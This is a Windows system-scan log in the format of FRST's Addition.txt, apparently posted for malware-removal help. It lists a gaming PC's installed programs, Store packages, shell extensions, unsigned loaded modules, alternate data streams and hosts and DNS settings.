FL Studio ASIO (HKLM-x32\...\FL Studio ASIO) (Version:  - Image-Line)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 103.0.5060.114 - Google LLC)
Launcher Prerequisites (x64) (HKLM-x32\...\{43a03b9c-4770-409c-a999-587b60700b63}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
MEGAsync (HKLM-x32\...\MEGAsync) (Version:  - Mega Limited)
Microsoft Edge (HKLM-x32\...\Microsoft Edge) (Version: 103.0.1264.62 - Microsoft Corporation)
Microsoft Edge WebView2 Runtime (HKLM-x32\...\Microsoft EdgeWebView) (Version: 103.0.1264.49 - Microsoft Corporation)
Microsoft GameInput (HKLM-x32\...\{A9CFD6A1-C0D3-7F37-C220-8B104867EF15}) (Version: 10.1.22621.1011 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\OneDriveSetup.exe) (Version: 22.131.0619.0001 - Microsoft Corporation)
Microsoft Update Health Tools (HKLM\...\{7B1FCD52-8F6B-4F12-A143-361EA39F5E7C}) (Version: 3.67.0.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{A49F249F-0C91-497F-86DF-B2585E8E76B7}) (Version: 8.0.50727.42 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{a1909659-0a08-4554-8af1-2175904903a1}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 x64 Additional Runtime - 11.0.61030 (HKLM\...\{37B8F9C7-03FB-3253-8781-2517C99D7C00}) (Version: 11.0.61030 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2012 x64 Minimum Runtime - 11.0.61030 (HKLM\...\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}) (Version: 11.0.61030 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 (HKLM-x32\...\{B175520C-86A2-35A7-8619-86DC379688B9}) (Version: 11.0.61030 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 (HKLM-x32\...\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}) (Version: 11.0.61030 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.40664 (HKLM-x32\...\{042d26ef-3dbe-4c25-95d3-4c1b11b235a7}) (Version: 12.0.40664.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.40664 (HKLM-x32\...\{9dff3540-fc85-4ed5-ac84-9e3c7fd8bece}) (Version: 12.0.40664.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.40664 (HKLM\...\{010792BA-551A-3AC0-A7EF-0FAB4156C382}) (Version: 12.0.40664 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.40664 (HKLM\...\{53CF6934-A98D-3D84-9146-FC4EDF3D5641}) (Version: 12.0.40664 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.40664 (HKLM-x32\...\{D401961D-3A20-3AC7-943B-6139D5BD490A}) (Version: 12.0.40664 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.40664 (HKLM-x32\...\{8122DAB1-ED4D-3676-BB0A-CA368196543E}) (Version: 12.0.40664 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.28.29334 (HKLM-x32\...\{b2d0f752-adc5-496e-8f70-8669de01f746}) (Version: 14.28.29334.0 - Microsoft Corporation)
Microsoft Visual C++ 2015-2022 Redistributable (x64) - 14.30.30704 (HKLM-x32\...\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}) (Version: 14.30.30704.0 - Microsoft Corporation)
Microsoft Visual C++ 2019 X86 Additional Runtime - 14.28.29334 (HKLM-x32\...\{14C49FC8-3E9B-4F29-8526-26629B5CF30B}) (Version: 14.28.29334 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.28.29334 (HKLM-x32\...\{0D01A812-82A1-481F-8546-8E28E976F8DF}) (Version: 14.28.29334 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2022 X64 Additional Runtime - 14.30.30704 (HKLM\...\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}) (Version: 14.30.30704 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2022 X64 Minimum Runtime - 14.30.30704 (HKLM\...\{662A0088-6FCD-45DD-9EA7-68674058AED5}) (Version: 14.30.30704 - Microsoft Corporation) Hidden
Microsoft XNA Framework Redistributable 4.0 Refresh (HKLM-x32\...\{D69C8EDE-BBC5-436B-8E0E-C5A6D311CF4F}) (Version: 4.0.30901.0 - Microsoft Corporation)
Minecraft Launcher (HKLM-x32\...\{27B34E47-68AE-4802-822A-9F0C187AF84A}) (Version: 1.0.0.0 - Mojang)
Mozilla Firefox (x64 en-US) (HKLM\...\Mozilla Firefox 102.0.1 (x64 en-US)) (Version: 102.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 89.0.2 - Mozilla)
NVIDIA FrameView SDK 1.2.7521.31103277 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_FrameViewSdk) (Version: 1.2.7521.31103277 - NVIDIA Corporation)
NVIDIA GeForce Experience 3.25.1.27 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.25.1.27 - NVIDIA Corporation)
NVIDIA Graphics Driver 512.59 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 512.59 - NVIDIA Corporation)
NVIDIA HD Audio Driver 1.3.39.3 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.39.3 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.21.0713 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.21.0713 - NVIDIA Corporation)
NVIDIA USBC Driver 1.46.831.832 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_USBC) (Version: 1.46.831.832 - NVIDIA Corporation)
OEM Application Profile (HKLM-x32\...\{84AD2AF7-10C8-0395-66F9-FFAEB4C5DBF1}) (Version: 1.00.0000 - Advanced Micro Devices, Inc.)
ONN. (HKLM-x32\...\ONN.) (Version: 1.0.0.5.05 - )
OpenAL (HKLM-x32\...\OpenAL) (Version:  - )
Origin (HKLM-x32\...\Origin) (Version: 10.5.113.50894 - Electronic Arts, Inc.)
Overwatch (HKLM-x32\...\Overwatch) (Version:  - Blizzard Entertainment)
PCSX2 - Playstation 2 Emulator (HKLM-x32\...\pcsx2) (Version: 1.6.0 - PCSX2 Team)
qBittorrent 4.4.2 (HKLM-x32\...\qBittorrent) (Version: 4.4.2 - The qBittorrent project)
r2modman 3.1.25 (HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\ac231ef6-6414-5f8d-b36f-3b57705721dd) (Version: 3.1.25 - ebkr)
RestMinder version 1.0.0.1 (HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\{F481E04A-B87F-46D3-8FC5-A3440DE071C9}_is1) (Version: 1.0.0.1 - RestMinder)
Riot Vanguard (HKLM\...\Riot Vanguard) (Version:  - Riot Games, Inc.)
Roblox Player for Miggy (HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\roblox-player) (Version:  - Roblox Corporation)
Spotify (HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Spotify) (Version: 1.1.89.862.g94554d24 - Spotify AB)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Streamlabs Desktop 1.6.4 (HKLM\...\029c4619-0385-5543-9426-46f9987161d9) (Version: 1.6.4 - General Workings, Inc.)
TeamViewer (HKLM-x32\...\TeamViewer) (Version: 15.8.3 - TeamViewer)
Ubisoft Connect (HKLM-x32\...\Uplay) (Version: 112.3 - Ubisoft)
Update for Windows 10 for x64-based Systems (KB4023057) (HKLM\...\{0BAA0A93-3AD3-4B19-9105-4C8C3FA92A83}) (Version: 2.67.0.0 - Microsoft Corporation) Hidden
Update for Windows 10 for x64-based Systems (KB4480730) (HKLM\...\{0746492E-47B6-4251-940C-44462DFD74BB}) (Version: 2.55.0.0 - Microsoft Corporation)
UpdateAssistant (HKLM\...\{F339C545-24DC-4870-AA32-6EB6B0500B95}) (Version: 1.24.0.0 - Microsoft Corporation) Hidden
UXP WebView Support (HKLM-x32\...\UXPW_1_1_0) (Version: 1.1.0 - Adobe Inc.)
VALORANT (HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Riot Game valorant.live) (Version:  - Riot Games, Inc)
Vortex (HKLM\...\57979c68-f490-55b8-8fed-8b017a5af2fe) (Version: 1.5.13 - Black Tree Gaming Ltd.)
Windows 10 Update Assistant (HKLM-x32\...\{D5C69738-B486-402E-85AC-2456D98A64E4}) (Version: 1.4.9200.22925 - Microsoft Corporation)
Windows PC Health Check (HKLM\...\{77ACFAF7-E5AB-410D-BA14-BBEBF89422DE}) (Version: 3.1.2109.29003 - Microsoft Corporation)
Zoom (HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\ZoomUMX) (Version: 5.10.4 (5035) - Zoom Video Communications, Inc.)
 
Packages:
=========
Adobe Notification Client -> C:\Program Files\WindowsApps\AdobeNotificationClient_3.0.1.1_x86__enpm4xejd91yc [2022-04-20] (Adobe Systems Incorporated)
BreeZip -> C:\Program Files\WindowsApps\3138AweZip.AweZip_1.4.15.0_x86__ffd303wmbhcjt [2022-07-13] (BreeZip)
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x64__8wekyb3d8bbwe [2021-03-15] (Microsoft Corporation) [MS Ad]
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe [2021-03-15] (Microsoft Corporation) [MS Ad]
Microsoft Solitaire Collection -> C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.13.7040.0_x64__8wekyb3d8bbwe [2022-07-13] (Microsoft Studios) [MS Ad]
Minecraft Launcher -> C:\Program Files\WindowsApps\Microsoft.4297127D64EC6_1.1.17.0_x64__8wekyb3d8bbwe [2022-06-08] (Microsoft Studios)
NVIDIA Control Panel -> C:\Program Files\WindowsApps\NVIDIACorp.NVIDIAControlPanel_8.1.962.0_x64__56jybvy8sckqj [2022-04-26] (NVIDIA Corp.)
Photos Media Engine Add-on -> C:\Program Files\WindowsApps\Microsoft.Photos.MediaEngineDLC_1.0.0.0_x64__8wekyb3d8bbwe [2022-01-07] (Microsoft Corporation)
Realtek Audio Control -> C:\Program Files\WindowsApps\RealtekSemiconductorCorp.RealtekAudioControl_1.2.175.0_x64__dt26b99r8h8gj [2020-07-31] (Realtek Semiconductor Corp)
Visage -> C:\Program Files\WindowsApps\SadSquareStudio.Visage_1.1.0.0_x64__855q6fdw1qbrg [2022-06-22] (SadSquare Studio)
WhatsApp Desktop -> C:\Program Files\WindowsApps\5319275A.WhatsAppDesktop_2.2222.12.0_x64__cv1g1gvanyjgm [2022-07-01] (WhatsApp Inc.)
Word Mobile -> C:\Program Files\WindowsApps\Microsoft.Office.Word_16001.14326.21062.0_x64__8wekyb3d8bbwe [2022-07-13] (Microsoft Corporation)
 
==================== Custom CLSID (Whitelisted): ==============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
CustomCLSID: HKU\S-1-5-21-2826498334-1472090739-1589450912-1002_Classes\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32 -> C:\WINDOWS\system32\oleaut32.dll (Microsoft Windows -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2826498334-1472090739-1589450912-1002_Classes\CLSID\{00020421-0000-0000-C000-000000000046}\InprocServer32 -> C:\WINDOWS\system32\oleaut32.dll (Microsoft Windows -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2826498334-1472090739-1589450912-1002_Classes\CLSID\{00020422-0000-0000-C000-000000000046}\InprocServer32 -> C:\WINDOWS\system32\oleaut32.dll (Microsoft Windows -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2826498334-1472090739-1589450912-1002_Classes\CLSID\{00020423-0000-0000-C000-000000000046}\InprocServer32 -> C:\WINDOWS\system32\oleaut32.dll (Microsoft Windows -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2826498334-1472090739-1589450912-1002_Classes\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32 -> C:\WINDOWS\system32\oleaut32.dll (Microsoft Windows -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2826498334-1472090739-1589450912-1002_Classes\CLSID\{00020425-0000-0000-C000-000000000046}\InprocServer32 -> C:\WINDOWS\system32\oleaut32.dll (Microsoft Windows -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2826498334-1472090739-1589450912-1002_Classes\CLSID\{0E270DAA-1BE6-48F2-AC49-317A81924068} -> [Creative Cloud Files] => C:\Users\Miggy\Creative Cloud Files [2020-08-04 16:40]
CustomCLSID: HKU\S-1-5-21-2826498334-1472090739-1589450912-1002_Classes\CLSID\{2F81B25E-7507-4844-BFF2-77D2CC24CED4}\localserver32 -> C:\Program Files\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe (Adobe Inc. -> Adobe Inc.)
CustomCLSID: HKU\S-1-5-21-2826498334-1472090739-1589450912-1002_Classes\CLSID\{9E121B07-D732-48C1-94D0-77C233EAE0F3} -> [MEGAsync] => C:\Users\Miggy\Documents\MEGAsync [2022-06-05 15:01]
CustomCLSID: HKU\S-1-5-21-2826498334-1472090739-1589450912-1002_Classes\CLSID\{d1b22d3d-8585-53a6-acb3-0e803c7e8d2a}\localserver32 -> "C:\Users\Miggy\AppData\Local\Microsoft\Teams\current\Teams.exe" --toast => No File
CustomCLSID: HKU\S-1-5-21-2826498334-1472090739-1589450912-1002_Classes\CLSID\{e8c77137-e224-5791-b6e9-ff0305797a13}\InprocServer32 -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll (Adobe Inc. -> Adobe Systems)
ShellIconOverlayIdentifiers: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\Miggy\AppData\Local\MEGAsync\ShellExtX64.dll [2022-06-23] (Mega Limited -> )
ShellIconOverlayIdentifiers: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\Miggy\AppData\Local\MEGAsync\ShellExtX64.dll [2022-06-23] (Mega Limited -> )
ShellIconOverlayIdentifiers: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\Miggy\AppData\Local\MEGAsync\ShellExtX64.dll [2022-06-23] (Mega Limited -> )
ShellIconOverlayIdentifiers: [   AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2022-06-29] (Adobe Inc. -> )
ShellIconOverlayIdentifiers: [   AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2022-06-29] (Adobe Inc. -> )
ShellIconOverlayIdentifiers: [   AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2022-06-29] (Adobe Inc. -> )
ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2021-05-06] (Igor Pavlov) [File not signed]
ContextMenuHandlers1: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2022-06-29] (Adobe Inc. -> )
ContextMenuHandlers1: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Miggy\AppData\Local\MEGAsync\ShellExtX64.dll [2022-06-23] (Mega Limited -> )
ContextMenuHandlers2: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Miggy\AppData\Local\MEGAsync\ShellExtX64.dll [2022-06-23] (Mega Limited -> )
ContextMenuHandlers3: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Miggy\AppData\Local\MEGAsync\ShellExtX64.dll [2022-06-23] (Mega Limited -> )
ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2021-05-06] (Igor Pavlov) [File not signed]
ContextMenuHandlers4: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Miggy\AppData\Local\MEGAsync\ShellExtX64.dll [2022-06-23] (Mega Limited -> )
ContextMenuHandlers5: [ACE] -> {5E2121EE-0300-11D4-8D3B-444553540000} => C:\Program Files\AMD\CNext\CNext\atiacm64.dll [2017-04-24] (Advanced Micro Devices, Inc.) [File not signed]
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\WINDOWS\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_4d7400884d0d52e3\nvshext.dll [2022-04-21] (Nvidia Corporation -> NVIDIA Corporation)
ContextMenuHandlers6: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2021-05-06] (Igor Pavlov) [File not signed]
ContextMenuHandlers6: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2022-06-29] (Adobe Inc. -> )
 
==================== Codecs (Whitelisted) ====================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Drivers32: [vidc.VP60] => C:\WINDOWS\SysWOW64\vp6vfw.dll [447752 2014-09-16] (Electronic Arts -> On2.com)
HKLM\...\Drivers32: [vidc.VP61] => C:\WINDOWS\SysWOW64\vp6vfw.dll [447752 2014-09-16] (Electronic Arts -> On2.com)
 
==================== Shortcuts & WMI ========================
 
==================== Loaded Modules (Whitelisted) =============
 
2021-10-18 17:33 - 2021-09-06 12:55 - 000033792 _____ () [File not signed] [File is in use] C:\Users\Miggy\AppData\Local\Programs\RestMinder\Gh.Common.dll
2022-07-12 17:36 - 2021-11-11 04:03 - 001495552 _____ () [File not signed] C:\Program Files (x86)\ONN\DuiLib.dll
2022-07-12 17:36 - 2018-09-06 03:45 - 000045056 _____ () [File not signed] C:\Program Files (x86)\ONN\HookDLL.dll
2020-12-26 15:42 - 2022-03-03 19:23 - 126965248 _____ () [File not signed] C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\libcef.dll
2020-12-26 15:42 - 2021-11-17 04:38 - 000384000 _____ () [File not signed] C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\libegl.dll
2020-12-26 15:42 - 2021-11-17 04:38 - 008006656 _____ () [File not signed] C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\libglesv2.dll
2021-10-18 17:33 - 2021-09-06 10:18 - 012201136 _____ () [File not signed] C:\Users\Miggy\AppData\Local\Programs\RestMinder\sdk.dll
2022-07-12 17:36 - 2019-07-18 06:35 - 000049152 _____ (0) [File not signed] C:\Program Files (x86)\ONN\CommFunc.dll
2022-07-12 17:36 - 2019-08-17 03:25 - 000119296 _____ (0) [File not signed] C:\Program Files (x86)\ONN\DrvInDll.dll
2021-10-18 17:33 - 2021-06-16 14:44 - 000117248 _____ (Countly) [File not signed] [File is in use] C:\Users\Miggy\AppData\Local\Programs\RestMinder\Countly.dll
2021-10-18 17:33 - 2018-01-10 14:34 - 000024064 _____ (Daniel Grunwald, Omer Mor, Alex Davies, jnm2) [File not signed] [File is in use] C:\Users\Miggy\AppData\Local\Programs\RestMinder\AsyncBridge.Net35.dll
2021-06-27 21:31 - 2021-05-06 00:00 - 000077824 _____ (Igor Pavlov) [File not signed] C:\Program Files\7-Zip\7-zip.dll
2021-10-18 17:33 - 2018-03-24 18:44 - 000475136 _____ (Newtonsoft) [File not signed] [File is in use] C:\Users\Miggy\AppData\Local\Programs\RestMinder\Newtonsoft.Json.dll
2021-10-18 17:33 - 2018-05-11 09:52 - 000074240 _____ (Sentry) [File not signed] [File is in use] C:\Users\Miggy\AppData\Local\Programs\RestMinder\SharpRaven.dll
2020-12-26 15:42 - 2022-03-03 19:23 - 000983552 _____ (The Chromium Authors) [File not signed] C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\chrome_elf.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 001282048 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [File not signed] C:\Program Files (x86)\Origin\LIBEAY32.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 000279040 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [File not signed] C:\Program Files (x86)\Origin\ssleay32.dll
2022-07-14 23:10 - 2022-07-14 23:10 - 002815488 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [File not signed] C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\libcrypto-1_1-x64.dll
2022-07-14 23:10 - 2022-07-14 23:10 - 000678400 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [File not signed] C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\libssl-1_1-x64.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 001611264 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\platforms\qwindows.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 005487104 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5Core.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 005841920 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5Gui.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 001179136 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5Network.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 000146432 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5WebSockets.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 005089792 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5Widgets.dll
2022-07-05 18:54 - 2022-07-05 18:54 - 000184832 _____ (The Qt Company Ltd) [File not signed] C:\Program Files (x86)\Origin\Qt5Xml.dll
2022-07-14 23:10 - 2022-07-14 23:10 - 000046592 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\bearer\qgenericbearer.dll
2022-07-14 23:10 - 2022-07-14 23:10 - 006270976 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\Qt5Core.dll
2022-07-14 23:10 - 2022-07-14 23:10 - 001389568 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\Qt5Network.dll
2022-07-14 23:10 - 2022-07-14 23:10 - 000157184 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\Qt5WebSockets.dll
2022-07-14 23:10 - 2022-07-14 23:10 - 000210432 _____ (The Qt Company Ltd.) [File not signed] C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\Qt5Xml.dll
2021-09-14 00:46 - 2021-09-14 00:46 - 005979312 _____ (The Qt Company Oy -> The Qt Company Ltd.) [File not signed] C:\Users\Miggy\AppData\Local\MEGAsync\Qt5Core.dll
 
==================== Alternate Data Streams (Whitelisted) ========
 
(If an entry is included in the fixlist, only the ADS will be removed.)
 
AlternateDataStreams: C:\WINDOWS\tracing:? [16]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer1.log:F107EE40EF [3442]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer1.log_backup1:2DD1EC5C91 [3442]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer10.log:CCC93B07B0 [3442]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer10.log_backup1:AD433BF298 [3442]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer11.log:72C8986B20 [3442]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer11.log_backup1:97A90964FA [3442]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer12.log:C40F6B9209 [3442]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer12.log_backup1:7CC29836A6 [3442]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer13.log:AE3C879266 [3442]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer13.log_backup1:AF8AA3CDC1 [3442]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer14.log:DE1448F4D7 [3442]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer14.log_backup1:D61270D3FD [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini:B1DA6C571C [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Creative Cloud.lnk:7661CCE9BF [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Illustrator 2022.lnk:0BBB729577 [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Photoshop 2022.lnk:638138415C [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Premiere Pro 2022.lnk:C56174E6CE [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini:41964AA945 [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Epic Games Launcher.lnk:BE32D07BC5 [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk:980850BA8A [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk:8096E45125 [3442]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Streamlabs Desktop.lnk:578370639A [3442]
AlternateDataStreams: C:\Users\Miggy\Application Data:00e481b5e22dbe1f649fcddd505d3eb7 [394]
AlternateDataStreams: C:\Users\Miggy\AppData\Roaming:00e481b5e22dbe1f649fcddd505d3eb7 [394]
AlternateDataStreams: C:\Users\Public\Shared Files:VersionCache [490]
 
==================== Safe Mode (Whitelisted) ==================
 
==================== Association (Whitelisted) =================
 
==================== Internet Explorer (Whitelisted) ==========
 
 
==================== Hosts content: =========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2018-04-11 16:38 - 2018-04-11 16:36 - 000000824 _____ C:\WINDOWS\system32\drivers\etc\hosts
 
==================== Other Areas ===========================
 
(Currently there is no automatic fix for this section.)
 
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\Control Panel\Desktop\\Wallpaper -> C:\Users\Miggy\Downloads\FXHeNR8WYAAmLXM.jpg
DNS Servers: 192.168.1.254
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
